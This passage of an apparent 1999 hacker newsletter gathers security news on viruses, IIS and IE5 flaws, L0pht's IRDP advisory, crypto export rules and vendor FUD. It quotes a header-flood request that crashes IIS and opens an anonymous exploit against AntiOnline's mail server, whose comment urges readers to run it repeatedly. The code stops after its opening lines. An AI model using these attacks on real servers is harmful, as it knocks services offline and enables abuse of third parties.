precautions to help keep your computer safe and sound. Shane Toven never worried about computer viruses. The chief engineer and IS manager for KAXE-FM in Grand Rapids, Minnesota, knew that the whole staff used antivirus software and practiced "safe computing." Then last April, Chernobyl -- one of the year's deadliest viruses -- slipped past the public radio station's security. Two of the station's Windows 95 machines suffered full meltdown. "At first, all of our PCs worked fine on April 26, the day Chernobyl was supposed to hit. Then a couple of t hem quickly ground to a halt," remembers Toven. "When I went to reboot, I got the dreaded 'insert system disk' message. According to Fdisk, there were no partitions and no boot sectors -- classic signs of Chernobyl." Feeling more than a little sheepis h, Toven realized he hadn't updated McAfee VirusScan's signatures, the data files that identify specific viruses. (He was using an older version of the package that could not update itself automatically.) Chernobyl probably sneaked in "through a contamina ted file attached to an e-mail from someone we knew," he says. The virus destroyed 2 gigabytes of data, including employee records, correspondence, and other vital files. Even if you follow the usual safeguards -- installing and updating a good antivi rus package, avoiding e-mail attachments from strangers, and never downloading files from the Internet -- your system probably isn't 100 percent safe from viruses. Few of us compute in isolation, never exchanging files with others. New viruses can claim c asualties before antivirus vendors identify them. Your best line of defense is to assume your PC will become infected -- and take steps now to save your neck. Smart precautions Experts and survivors who've tangled with the nastiest viruse s offer the following wisdom: MAKE UPDATING SIGNATURE FILES EASY: As Toven discovered, the key to warding off most attacks is simply keeping your antivirus software updated. But remembering to check for new signature files, downloading them, an d distributing them to the people who need them can be a hassle. Fortunately, most programs now remind you when signature files need to be updated, and will download the update for you from the company's Web site at the click of a button. The best, includ ing Norton AntiVirus, PC-cillin, and McAfee VirusScan, perform this job automatically as often as once a day. KEEP A BOOT DISK HANDY: Melissa and other Word and Excel macro viruses that torment most users at one time or another do little seriou s damage. But an infestation such as Chernobyl may stop your PC from even starting up. That's when you reach for the boot disk -- a floppy from which you can run the antivirus program's scanner if your PC becomes inoperable. Most antivirus packages give y ou the option of making a boot disk during setup. If yours does not, you can easily make your own, notes Ken Dunham, virus expert at About.com (formerly the Mining Company). Dunham says users can find instructions for creating a start-up disk, plus other virus-related advice, at antivirus.about.com (link below). "You should boot from a clean disk before removing a virus," he says. "Some viruses can't be cleaned any other way." USE MORE THAN ONE ANTIVIRUS UTILITY: No single antivirus package can detect and remove every virus, so using multiple programs lessens the chance of a virus getting through. "Pay for one commercial package and add one or more free programs," suggests Dunham. "Set the primary package to scan all the time and use the second ary programs only when you need them, so they don't conflict. It's like getting a second opinion from a doctor." Find a list of free antivirus products at antivirus.about.com/library/weekly/aa051099.htm (link below). And pick up extra protection from a fr ee Web-based scanning service like Trend Micro's HouseCall or Network Associates' McAfee Clinic (links below). CLEAN UP AFTER AN INVASION: Once you rid your PC of its marauder, don't stop there, advises Joe Wells, author of the WildList of viru ses. "Read up on what the virus does to files, then take steps to eliminate unpleasant surprises down the road," he says. "For instance, Melissa turns off the dialog box asking if you want to enable macros in Microsoft Word documents, so after disinfectin g you'll need to turn that feature back on to remind yourself you have that security option." (In Word 97, select Tools, Options, click General, and check "Macro virus protection"; in Word 2000, select Tools, Macros, Security and choose Medium security.) Back in Grand Rapids, Shane Toven was about to reformat the hard drives on his devastated computers when he happened upon PowerQuest's Lost & Found data-recovery utility (link below). "I downloaded and installed the demo, and in half an hour, I had re covered all my wiped-out files," reports Toven. Another utility, the free MRecover (link below), can also restore Chernobyl-savaged computers. Toven got a lucky break. Your best defense: Keep backups of all your vital data. After his near-fatal brush with Chernobyl, Toven changed his modus operandi: "I went out and bought a separate NT server just for backups," he reports. "I also now keep clean, write-protected boot disks for each operating system we use." Carla Thornton is a contributing editor for PC World. If you're having trouble resolving a PC-related hardware or software probl em, we'd like to hear from you. @HWA 54.0 NEW MAIL ATTACK IDENTIFIED ~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 12th August 1999 on 5:00 am CET Information security consultant R. Rosenberger says to have developed an e-mail-borne attack which can potentially defeat most major network security and anti-virus software products. Instead of slipping in undetected this attack attacks the security software head-on as it tries to scan e-mail attachments. The flaw is said to be that most security software products are unable to handle "pathological events". As an example is given a recursive e-mail attachment (multiple attachments in attachments) which could crash security products trying to scan it and which on its turn could take the whole operating system with it, effectively shutting the server down. "I know of products where I can own the box, just by sending an e-mail that nobody receives. I can own the e-mail server, the gateway server -- anything that's part of the e-mail infrastructure," Rosenberger said. Full story. http://www.internetnews.com/bus-news/article/0,1087,3_180651,00.html New Attack on E-mail Infrastructure Identified August 11, 1999 By Brian McWilliams InternetNews.com Correspondent Business News Archives An information security consultant said Wednesday he's discovered a serious flaw in network security and anti-virus software products -- a flaw that could threaten the Internet's e-mail infrastructure. According to Robert Rosenberger, he's developed an e-mail-borne attack which can potentially defeat most major security products -- not by slipping by undetected, but by attacking the security software head-on as it tries to scan email attachments. While most security software products can successfully protect themselves against code that tries to disable them, Rosenberger claims they also contain programming errors which render them unable to handle what he calls "pathological events". One example is a recursive e-mail attachment, or multiple attachments within attachments. According to Rosenberger, when security products encounter such specially crafted files at the local or server level, most will crash, and take the operating system with them. "I know of products where I can own the box, just by sending an e-mail that nobody receives. I can own the e-mail server, the gateway server -- anything that's part of the e-mail infrastructure," Rosenberger said. Besides consulting to corporations and government agencies, Rosenberger is the author of the Computer Virus Myths Web site which critizies anti-virus software vendors for whipping up what he calls virus hysteria in an attempt to boost sales. Rosenberger recently notified Network Associates, Symantec, and several other major antivirus software vendors about his findings and most have promptly responded by upgrading their products to thwart the attack, which he calls the E-mail Infrastructure Security vulnerability. Officials of the firms were not immediately available for comment. A representative of the Computer Incident Advisory Capability (CIAC) Wednesday said that organization was not aware of Rosenberger's findings. Officials from the Computer Emergency Response Team (CERT) were not immediately available for comment. While he hasn't publically released information about his exploit, Rosenberger says others could potentially discover similar flaws. "In about three weeks, every wannabe hacker on the planet is going to know about this and post some kind of sample file, and they're going to be a lot better than mine." @HWA 55.0 ERROR IN MICROSOFT PATCH ~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 12th August 1999 on 4:30 am CET On 11 August 1999, Microsoft released a patch for the "Malformed HTTP Request Header" vulnerability. A error has been discovered in that patch. Microsoft has removed the patch from their ftp and are working on correcting the error and expect to re-release the patch in a few days. MS Advisory. http://www.microsoft.com/security/bulletins/ms99-029regression.asp From http://www.securityfocus.com/ NT IIS Malformed HTTP Request Header DoS Vulnerability Bugtraq ID: 579 Failure to Handle Exceptional Conditions Remote: Yes Local: Yes Published: August 11, 1999 Updated: August 13, 1999 Microsoft Commercial Internet System 2.5 Microsoft Commercial Internet System 2.0 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 - Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 Microsoft Site Server 3.0 Commerce Edition - Microsoft Windows NT 4.0 - Microsoft IIS 4.0 + Microsoft Windows NT 4.0 - Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 Microsoft Site Server 3.0 + Microsoft Site Server 3.0 Commerce Edition - Microsoft Windows NT 4.0 - Microsoft IIS 4.0 + Microsoft Windows NT 4.0 - Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft Commercial Internet System 2.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0 Microsoft IIS and all other products that use the IIS web engine have a vulnerability whereby a flood of specially formed HTTP request headers will make IIS consume all available memory on the server and then hang. IIS activity will be halted until the flood ceases or the service is stopped and restarted. Quoted from Nobuo Miwa's post to Bugtraq: Simple play. I sent lots of "Host:aaaaa...aa" to IIS like... GET / HTTP/1.1 Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes) Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes) ...10,000 lines Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes) I sent twice above request sets. Then somehow victim IIS got memory leak after these requests. Of course, it can not respond any request any more. If you try this, you should see memory increase through performance monitor. You would see memory increase even after those requests finished already. It will stop when you got shortage of virtual memory. After that, you might not be able to restart web service and you would restart computer. I tried this against Japanese and English version of Windows NT. Microsoft released a patch for this vulnerability on August 11, 1999. However, on August 12, 1999 they retracted it due to an error that made IIS hang whenever the logfile was an exact multiple of 64KB. Microsoft is working to correct this error, and will re-release the patch when it is solved. Reported to Microsoft by Nobuo Miwa . Microsoft Security Bulletin MS99-029 released August 11, 1999. advisory: MS99-029: Patch Available for "Malformed HTTP Request Header" Vulnerability (MS) web page: Frequently Asked Questions: Microsoft Security Bulletin (MS99-029) (Microsoft) web page: Error in Patch for "Malformed HTTP Request Header" Vulnerability (Microsoft) message: IIS 4.0 remote DoS (MS99-029) (Nobuo Miwa ) @HWA 56.0 NEW IE5 BUG EXPOSES PASSWORDS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 12th August 1999 on 4:00 am CET Techweb reports the following: "Bug-reporting sites have identified a new security problem with Microsoft's Internet Explorer 5.0 browser. When users access an FTP-protected site and then try to download files, their user name and password can be exposed to snoopers. So far, there are no known cases of any break-ins caused by the glitch. Techweb. http://www.techweb.com/wire/story/TWB19990811S0013 @HWA 57.0 KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 12th August 1999 on 3:20 am CET Forbes has a story on a new crypto company setting up shop in the States, but which is able to evade the US restrictions on the export of sensitive crypto because their product designers reside in Sweden. Read more on the company and its products here. http://www.forbes.com/forbes/99/0823/6404078a.htm Software Fund Survey Database An encryption firm finds the key to success: not being born in the U.S.A. Data lock By Nikhil Hutheesing E-COMMERCE will really take off only after we find better ways to keep sensitive personal and corporate data under lock and key. Keeping data secure yet accessible to the right people is harder than you might think. Protegrity, a Swedish firm invading the U.S. market by setting up its headquarters in Stamford, Conn., is making this market its own. One reason it can beat out U.S. competitors in landing business from firms that span the globe: It can run around U.S. export restrictions on encryption software. Since it's a foreign-born business, it can sell abroad without running afoul of U.S. export laws. It ships software from Sweden. Protegrity's roots go back to 1994, when Ulf Dahl, a business executive who managed a software company in Stockholm, was writing software that would let city governments store personal data--such as marriage certificates and medical histories--while keeping those data separate from citizens' names and inaccessible to snoops. He came across Anonymity Protection, a Swedish startup in Gothenburg that was creating encryption software, and joined it. Dahl and the engineers at Anonymity devised two programs. One sits on a server and stores the company's security policy, including information on who may access which account files. That information is securely transmitted to all the other servers--perhaps thousands of them--that plug into a company's databases. A second program then encrypts the designated files on the database. Note that this lock and key is a bit different from what you usually see in a computer network storing sensitive data. Your brokerage firm, for example, often stores your account data and password in unencrypted form on a server. It protects your information by encrypting the transmission of the data across phone lines. Your password is scrambled as it leaves your modem, thwarting an eavesdropper who might tap into the phone line. But the trading records are stored in plain text. Someone breaking into the broker's database server could get access to them. In the Protegrity system, you encrypt only the specific data you want to keep hidden from snoops while leaving other data accessible to internal users or outsiders tapping in, perhaps, over the Internet. Data can be encrypted at 128 bits or higher (you could need more computers than the Pentagon has to crack the code). Getting hold of data by unauthorized users is tough because a series of events, transparent to the user, have to occur. When you try to gain access to information, Protegrity's system checks to see if you have been included as an authorized user in the gatekeeper. If you pass that, it goes on to double-check that the database that keeps your data is also instructed to let you in. Then it checks a series of rules that determine the information you are allowed to see. Once you pass those steps, and the system sees you are allowed to see the encrypted data, it generates a decryption key that is stored by the gatekeeper in encrypted form. In 1996 Protegrity set up shop above a restaurant overlooking a marina in Stamford. "I realized that to make a success of this product, I would have to go where the market was," explains Dahl. To run the show, the company hired David Morris, who had been an executive vice president at Cylink, a manufacturer of cryptographic products. Although Protegrity had become naturalized, it keeps its product designers in Sweden. The company continues to enjoy its exemption from the U.S. ban on exporting sensitive encryption technology. That ban was meant to prevent hostile nations and criminals from talking in ways that G-men can't understand, yet its effect has been to hand foreign firms a huge advantage in the market for software to encrypt and decrypt sensitive files. That software segment could be worth $9 billion in sales over the next five years, says the Economic Strategy Institute. At the end of 1997 there were already 653 encryption products being made in 29 countries outside of the U.S. Unlike Protegrity, American encryption companies have to engage in some fancy footwork to stay legal. "It's like defusing mines--one wrong turn and the mine could explode," says Stewart Baker, a partner in the law firm Steptoe & Johnson in Washington, D.C. For instance, if only two of a firm's engineers, one in the U.S. and one abroad, were to exchange insights about an encryption algorithm, the U.S. government could shut the company down, fine it $1 million and jail its employees. Tiny Protegrity has yet to turn a profit, but that could change. Oracle, IBM and Informix all promote a version of Protegrity's software that works with their databases. Customers are also putting more of their sensitive data on-line. Lucent Technologies, which uses Informix's databases attached to a Protegrity security system, now lets companies that buy wireless equipment log on to its Web site to pull up their account information. Before the switchover a few months ago, customer data had been kept separate, and could be provided only by fax or phone. Roche Holdings' Swedish offices used Protegrity to integrate patient information into its database. Now doctors there can key in the names of their patients, the drugs they take and the side effects. If Roche's database detects a dangerous trend--say, too many patients begin fainting--Roche could quickly notify all the doctors. There is pressure on the government to loosen the U.S. export laws on encryption. But even if that happens, Protegrity and its offshore rivals will have a head start over any U.S. competitors. @HWA 58.0 L0PHT IRDP ADVISORY ~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Thursday 12th August 1999 on 3:40 am CET "Companies and users of broadband modems beware: Malicious hackers may be "listening" in on your computer's conversation across the Internet." ZDNet picks up on the today released IRDP advisory by L0pht Heavy Industries, a flaw which could allow an unauthorized user to intercept outgoing information, possibly modify unencrypted or lightly encrypted data or deny service to the network. ZDNet story. -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Hackers may be snooping on you By Robert Lemos, ZDNN August 11, 1999 5:41 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2313209,00.html Companies and users of broadband modems beware: Malicious hackers may be "listening" in on your computer's conversation across the Internet. That's the danger highlighted in a security advisory released on Wednesday by hacker-cum-security specialists L0pht Heavy Industries. The flaw affects Windows 95, 98 and 2000 as well as the SunOS and Solaris 2.6 running a network service known as the ICMP router discovery protocol, or IRDP, that determines the route computers use to connect to the Internet. The result: An unauthorized user can intercept outgoing information, possibly modify unencrypted or lightly encrypted data, or deny service to the network. A slight detour for data Except for the denial of service attack, the malicious programmer needs to be inside the network, stated the advisory. For cable modem users, however, an internal user could be anyone on the local loop -- a neighbor or someone on the next block. Since many cable-modem-based networks use the rerouting technology, users are left open to someone snooping their communications to the Internet. In essence, another computer on the same network can be used to change the default path that packets take out to the Internet. By placing the address of their own server in the system, an attacker can look at all the outgoing packets of information. While it's a bit of a one-sided conversation -- since incoming packets enter the network normally -- a great deal of information can be gleaned from the outgoing packets, possibly including passwords and credit cards numbers. The most worrisome part of the flaw on Microsoft Windows is that the operating system continues to be vulnerable even when the user believes they have closed the hole. (See the L0pht advisory.) Some assembly required In a move long considered controversial, L0pht has decided to release the source code to the basics of a program that could exploit such a hole. However, L0pht did delay the release of the advisory at Microsoft's request, said one L0pht member, known by his handle Space Rogue, in an e-mail. Microsoft and Sun Microsystems Inc. declined to offer comment while members of L0pht could not be contacted. @HWA 59.0 Stronger computers, easier encrypton, RSA coding ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.403-security.org/ Astral 12.08.1999 resource section is going to have more than 1000 links till the end of the day If a new design of a computer gets build keys of a bank's and other organisations could be easy target of big company's because that kind of computer would cost " only " $2 millions and that is not so much money for big company's. Adi Shamir helped to develop new computer and new design of cripting known as RSA.Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key - a sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered. Links: TechServers http://www.techserver.com/noframes/story/0,2294,81475-128761-902330-0,00.html Code-breakers are gaining on cryptography Copyright © 1999 Nando Media Copyright © 1999 Associated Press From Time to Time: Nando's in-depth look at the 20th century. BY JEFF DONN WORCESTER, Mass. (August 13, 1999 10:29 a.m. EDT http://www.nandotimes.com) - Computer encryption experts say a new computer design, if built, could crack the secret keys that now protect the bulk of electronic commerce. The estimated cost of such a computer - $2 million - would be manageable for many organizations. But most highly sensitive military, banking and other data are already protected by stronger keys, according to cryptographers at the conference where the design was shown. The commonly used weaker keys, though, would become "easy to break for large organizations," said cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot, Israel. He developed both the new computer design and helped invent the widespread coding system - known as RSA public-key encryption - that it attacks. Shamir spoke Thursday at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic Institute. Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key - a sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered. Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine and also refers to the twinkle of its light emitting diodes. The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA encryption keys faster than ever - within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and several months. Shamir first informally showed a prototype of his device at a conference in Prague, the Czech Republic, in May. He publicly outlined its workings at length for the first time Thursday. "Twinkle is a little out there, but it looks like it's buildable to me," said Seth Goldstein, an expert in computer architecture at Pittsburgh's Carnegie Mellon University. Organized crime, friendly and unfriendly governments, research institutions and others might take an interest in such a project, conference participants suggested. In any event, users of 512-bit keys "should be worried," said Christof Paar, a computer engineer at Worcester Polytechnic Institute. "In the current state of the art, it is not secure," added Bob Silverman, a research scientist at Bedford-based RSA Laboratories, a division of RSA Data Security. Shamir co-founded RSA Data but no longer works there. Longer keys, such as 1,024-bit, are already employed for many sensitive communications. But, out of intelligence and other concerns, the U.S. government requires special permission to export software with the longer keys. The most popular browsers are normally set to just 512 bits. Brian Snow, a technical director for information security at the National Security Agency, spoke to the conference Thursday about weak quality assurance in commercial security products. But he declined to answer general questions for the press. Though available, longer keys are harder to set up and take more computer power to operate. Such power may be scarce in the wireless telephones, home appliances and other computerized conveniences of the future, cryptographers said. @HWA 60.0 Security police isn't doing enough ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.403-security.org/ Astral 12.08.1999 meteor rain Former federal prosecutor, Mark Rasch, says that while current cybercrime laws are extremely broad and could possibly be interpreted in such a way that makes most internet users criminals, businesses should still invest heavily on network security Links: ZDNet (Story url not found on ZDNet) 61.0 Hack attacks drive outsourced security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From ZDNet http://www.zdnet.com/filters/printerfriendly/0,6061,411335-54,00.html -------------------------------------------------------------- This story was printed from PC Week, located at http://www.zdnet.com/pcweek. -------------------------------------------------------------- Hack attacks drive outsourced security By Jim Kerstetter and John Madden, PC Week August 8, 1999 9:03 PM PT URL: When it comes to implementing network security, even the outsourcers are turning to outsourcing partners. Internet Security Systems Inc., the company that put network intrusion detection on the map, will announce this month that it is providing managed security services to Internet service providers such as AT&T Corp. and to outsourcing companies such as Electronic Data Systems Corp. ISS has similar partnerships in the works with British Telecommunications plc., MCI WorldCom Advanced Networks and Nippon Telephone & Telegraph Corp., officials said. Driving this second layer of outsourcing is the complexity of security technology, particularly vulnerability scanning and intrusion detection, along with a shortage of people who can manage such a critical part of a company's network. "We've actually been doing this ... for some time with a few customers," said Tom Noonan, CEO of ISS, in Atlanta. "It's finally gaining some traction." It's also likely to gain interest from harried IT administrators at places such as Cornell University's Graduate School of Management. Two weeks ago, hackers broke into one of the school's Sun Microsystems Inc. servers running a database of statistical research material. The intruder had set up a File Transfer Protocol site on the server, presumably to take out information. "[Intrusion detection] is almost becoming a full-time job--detecting it and then cleaning up after it," said Kevin Baradet, the Ithaca, N.Y., graduate school's network services director. Baradet is looking to purchase intrusion detection software for the graduate school, with 24-by-7 support likely to weigh heavily on his mind, he said. Security outsourcing is not new. IBM Global Services, in Armonk, N.Y., has more than 450 people dedicated to security, including an implementation program for ISS products. Companies such as GTE Internetworking have been hosting security products for years. But now, many more players are jumping into the market. Compaq Computer Corp., for example, has begun a pilot project with ISS to provide intrusion detection. The Houston company's Security Healthcheck service will, for now, be entirely managed by Compaq consultants. It's in pilot testing with several customers and will be in general release by the end of the year, said officials at Compaq's services division in Stow, Mass. In addition, Control Data Systems Inc., of Arden Hills, Mich., last week announced security outsourcing services, including perimeter security, data and resource protection, management and monitoring, and identification and authentication. For ISS, the next step is taking those relationships further. Not only is the company selling the software and training to outsourcing partners, it also is providing a managed service to those companies to ensure they're properly addressing their customers' security needs. The outsourcing partners will set the pricing for the security services; IT managers can expect that upfront costs will be less than buying their own security solutions. ISS' RealSecure Network Engine, for example, costs $8,995, a price that doesn't include implementation or paying a trained administrator to monitor it around-the-clock. Over the coming year, ISS plans to improve the scalability of its vulnerability scanning and intrusion detection products to make them more suitable for outsourced management, Noonan said. In essence, ISS is offering itself as a manager of the burglar alarms of corporate networks, usually through the outsourcing partner. "There is a need for someone to be the ADT [Security Services Inc.] of the Internet," Noonan said. "And we might as well lay claim to that." @HWA 62.0 Backdoors in Windows? ~~~~~~~~~~~~~~~~~~~~~ Are there "back doors" in Windows 95 and 98, where hackers on the Internet can get info from your PC? -- Louis from Seaside Heights ZDTV It is possible for hackers to get to your computer if you share hard drives or have a static IP address. At Rootshell (http://www.rootshell.com, ICSA (http://www.icsa.net, and the Computer Emergency Response Team (http://www.cert.org, you can learn about how people do this on Windows 95. These are very useful webpages for security problems. You may also want to check out such newsgroups as comp.risks. If you use a dial-up connection, your computer's IP address will not stay the same, so hackers will have a hard time locating it. However, computers that use a cable modem or network access with a static IP address are a little bit easier to hack. You shouldn't be too paranoid, though: Evil hackers are mostly concerned with banks, the Pentagon, and keeping Babylon 5 on the air, not what you have on your personal PC. At any rate, see below for a list of links with information about online security. Rootshell http://www.rootshell.com Computer Emergency Response Team http://www.cert.org The US Department of Energy's Computer Incident Advisory Capability http://ciac.llnl.gov ICSA http://www.icsa.net DigiCrime (it's harmless, we promise!) http://www.digicrime.com/dc.html @HWA 63.0 The NewbiesThe Newbie's Guide to Fear, Uncertainty, and Doubt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Buffer Overflow on HNN http://www.hackernews.com/ By: Brian Martin Introduction Fear, Uncertainty and Doubt (FUD). We all live with it, and we're all accustomed to it at one level or another: "Do I have enough insurance?"; "Did I leave the coffee pot on when I left for work this morning?"; "Will my proposal be accepted by management?" FUD is simply a facet of life; something with which we all must contend to the best of our abilities. FUD is yet another method often employed by a party (typically a vendor in our context) to help propogate their product or service. In short, this is acheived by attempting to instill a sense of fear, uncertainty or doubt in the minds of consumers regarding a competitor's product. By instilling FUD in the minds of consumers, the vendor obliquely promises dire consequences if the intended target does not buy their goods. The obvious fallacy with this approach is that a vendor's product or service (P&S) is not sold on it's own merit; rather it is sold as a "reasonable alternative". FUD's primary goal is to scare consumers away from using superior P&S in favor of inferior (yet often more recognized) P&S. According to the New Hackers Dictionary (aka the Jargon file), FUD is defined as: FUD /fuhd/ n. Defined by Gene Amdahl after he left IBM to found his own company: "FUD is the fear, uncertainty, and doubt that IBM sales people instill in the minds of potential customers who might be considering [Amdahl] products." The idea, of course, was to persuade them to go with safe IBM gear rather than with competitors' equipment. This implicit coercion was traditionally accomplished by promising that Good Things would happen to people who stuck with IBM, but Dark Shadows loomed over the future of competitors' equipment or software. See IBM. After 1990 the term FUD was associated increasingly frequently with Microsoft, and has become generalized to refer to any kind of disinformation used as a competitive weapon. (1) The past few years have brought a dramatic increase in the FUD tactic. Not only are large companies using it to help stifle new and upcoming competition, in addition, uneducated journalists are wielding it like a four year old with a loaded gun: unaware of the danger, or of the consequences. The use of FUD in a marketing campaign is often subtle and hard to spot. Well written FUD will blend in among facts and be difficult to discern. Worse, this underhanded tactic is often problematic in trying to counter. Rather than fighting against incorrect facts or misguided opinions, you find yourself battling vague assertions, self-serving maxims, and half-truths. Worse yet is spotting the FUD campaign in the first place. Because it is an effective weapon based on half-truths, distinguishing it from legitimate opinion may be difficult. For an excellent paper and well documented examples of this, consult the paper titled 'FUD 101'. (2) In this document, Mr. Green outlines several elements and examples of Microsoft using a FUD campaign against the Linux Community. In today's world of articles and press releases, we can identify several levels of FUD. This is important as it tells us how to respond to the 'news'. The more FUD, the more skepticism that should be given to it. The less FUD, the better the chance it was just uneducated conclusions that lead to the text. Twelve Elements of FUD To help newcomers to the world of FUD, I have come up with a list of twelve elements that can and are used. In order to make this even easier for the consumer, I have devised a scale to help qualify the 'FUD level' used in a particular piece of writing. While this delineation is by no means an exact science, it can help put into perspective the subtle technique of disinformation. a) Urgency 1) Buy our product now to avoid headache tomorrow! While this may be appealing initially, this often comes at the sacrifice of features or performance. Yes, it may be easy to use, but odds are it does a third of what competitor's products do. 2) Buy our product now because tomorrow our product will kick ass! The promise of future development (also known as 'vaporware') encourages you to purchase the product now in order to receive future upgrades that will be better than what is on the market now. Obviously, this does nothing but hurt you in the here and now. b) Supporters 3) No quoted names. In this world of technology professionals, it is easy to find someone who is a) qualified, b) supportive of the product and c) willing to go on the record. Anytime an article comes out that claims a P&S is desired or supported, but lacks names to back those claims, should be questioned. Why couldn't they find at least one person to go on record endorsing the product? 4) Quoting known frauds and charlatans. Worse than quoting no one is to quote frauds. Rather than not finding someone to endorse a P&S, they had to turn to someone that is well known for NOT knowing technology. These people will often go on the record endorsing anything if it propogates their name or company, or leads to them receiving some kind of incentive (read: cash). c) Technical 5) Epiphany Nomenclature Significance Naught (3) The use of large or fancy words in place of readily understood technical terms. Obscuring features behind words that sound impressive is a common way of hiding the truth. This technique is often known as 'buzzword compliance'. 6) Hyping up old or standard features in place of current or impressive technology. We all use and trade email, so a company drooling over themselves in light of their amazing use of the SMTP (4) protocol means very little. d) Harm 7) Without our P&S, you'll be hacked! New security and crypto based companies are fond of using this ploy. Without their products, you are a time bomb waiting to go off! Come tomorrow, evil and malicious hackers will intrude upon your network, deface your web page, read your corporate secrets and pour sand in your gas tank! 8) Without our P&S, you will not get future business! The trend of business is moving toward our product and what we deem standardizations! If you and your company don't jump on our bandwagon, no other company will do business with you! As we all know, new technology and new standards are only adopted after long and rigorous testing. To move over to a new platform or protocol simply because some companys says so is ludicrous. 9) Without our P&S, you will lose time and money! This varies slightly from #2 in that the FUD centers around your company losing time and money today, not tomorrow. As we all know, any enterprise outfit that could possibly lose money in a matter of days without a specific product not already implemented is doomed to begin with. e) Spin Doctoring (2) 10) Hyping opponent's weakness No more than a form of mudslinging, the company doesn't rely on its own merit to pursuade you to use their products. Rather, they must display their opponents weaknesses and use them to convince you not to use theirs. 11) Creating weaknesses for the opponent Sometimes an opponent has very few weaknesses. So, why not make some up? Clever wording and sometimes outright lies lead to one company creating supposed weaknesses in competitors P&S. 12) Attacking opponent's strengths Akin to #1, this relies on attacking the selling points of a competitor's P&S. Often times, you will see this used in conjunction with #1 to attempt to completely belittle the opposing P&S. For fun and amusement, you can use the twelve points above to rate articles. If an article or press release uses some of the methods above, attribute it one point per method. In the end, you can say that a given article has a "FUD Factor of 4" or rated "7 on the FUD scale". Recent months have shown Microsoft to be repeat offenders, often rating between 5 and 10 on the FUD Scale. Their fear of the Linux operating system shows. No one should ever rate higher than a 10, unless the article is made up of nothing but FUD. Response to FUD As with all problems, it does little good to discuss them without proposed solutions. With FUD, it is much more manageable and easy to deal with. The first thing is recognizing FUD in all its forms. Awareness for the average person is the tricky part. Consider the average person that has an interest in the ever changing world of technology and networking. They go day to day without the benefit of forums that readily challenge these huge companies oozing FUD at every crevice. Unfortunately, they are a bulk of the customers and supporters of these P&S. Educating them is the first step toward an honest profession. Second, is the response. Even if you do recognize a company peddling FUD, how do you respond? Very simple. 1) Mail the author of the FUD as well as their editor. When doing so, be polite and present facts to back your mail. Site reference material, URLs or anything solid to back your argument and counter theirs. 2) Once mailed, give them a chance to correct their mistakes. Do not assume the FUD was intentional. The correction can come in the form of a retraction or followup article. As much as I hate to say it, the media machine may not allow for either. At that point, you must decided what to do. 3) Openly dispute the article in a public forum. Be it a mail list or web board, post the relevant parts of the article containing the FUD and refute them with your own facts. This causes a bit more strife but may be the only solution. Fin The use of Fear, Uncertainty, and Doubt in marketing campaigns -- while certain to get the public's attention -- is plainly wrong. Armed with the above information, it's our hope that the reader will now be able to spot it, refute it, and most importantly, not buy into it. Brian Martin Copyright 1999 Brian Martin References (1) Entry for FUD in the Jargon File (2) Eric Green (eric@linux-hw.com) for his paper 'FUD 101'. An excellent resource for real world examples and definitions. http://members.tripod.com/~e_l_green/fud101-4.html (3) By using standard synonyms from www.dictionary.com, we can create an alternate phrase that sounds impressive, yet means nothing. Fancy -> Epiphany, Words -> Nomenclature, Meaning -> Significance, Nothing -> Naught. "Fancy words meaning nothing". (4) SMTP stands for Simple Mail Transfer Protocol. The existing protcol that has been delivering your e-mail for over a decade. Thanks Space Rogue (spacerog@l0pht.com) for the idea of this paper and harassment. ATTRITION Staff (staff@attrition.org) for peer review and harassment. Anna Henricks, Geekgrl, and especially Jay Dyson for proof reading and suggestions. @HWA 64.0 Crashing AntiOnline's SMTP server? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.innerpulse.com/ Crash AntiOnline SMTP Server? Contributed by siko Tuesday - August 10, 1999. 09:17PM UTC An anonymous contributor submitted source code that is supposed to crash AntiOnline's SMTP/pop3 servers. This is unconfirmed and not supported by Innerpulse staff. (ditto for HWA staff =),- Ed) anti-smtp.c /* * This simple peice of code will exploit one of the many buffer overflow problems * with the SMTP/POP3 daemon software on the Antionline mail server, causing a denial of * service. I'm sure there are much more serious problems which could be caused, * if you know what I mean. Give this to everyone you know. Tell them to run it * over and over. Maybe that will convince JP to fix this, because it's been around * for months and months, and he's been notified of it more than once. I wish I * didn't have to do this. * * Cheers, * * -- jbx */ #include #include #include #include #include #include char 